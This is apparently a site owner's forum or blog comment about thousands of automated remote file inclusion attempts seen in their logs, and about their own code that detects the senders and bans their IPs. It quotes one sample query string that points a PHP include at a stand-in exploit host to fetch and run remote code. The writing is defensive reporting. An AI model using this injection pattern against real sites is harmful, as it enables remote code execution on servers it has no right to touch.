I also see similar behaviour with what I suspect are worms. They’re finding URLs on my site and adding something along the lines of ?var1=http://exploithost.com/exploitcode.txt to the end. The attempt is to have me include that URL with code that would normally include a local file and then execute it as PHP.

The strange thing is that the “var1″ part is often literally “var1″ or just “var”. Occasionally it’s “?page=http….” or “?p=http…” but that’s quite rare. It’s like some script kiddy has downloaded the script but hasn’t bothered configuring it for his own needs and has just left the default, placeholder variable names in the script.

I get thousands of these.

The other thing they do is if the URL doesn’t end in “.html” or “.php” then they add “/index.php” before adding the “?var1=http…” part. Most of the URLs on my site are generated by RewriteRules that translate the URL into something completely different behind the scenes. This means that nearly all of the requests they make are for invalid URLs, many of which return a 302 redirect to the correct page.

It seems there are unwashed masses in all walks of life.

All of them trace back to NetCatHosting in Ukraine.

The code that checks for these is pretty darn effective, as it now spots blog spammers and automatically adds them to the blog spammer database and bans the ip, after specific checks are completed.

I would be interested to know where I can direct our host to show them these IPs are flagged all over the place as known spammers.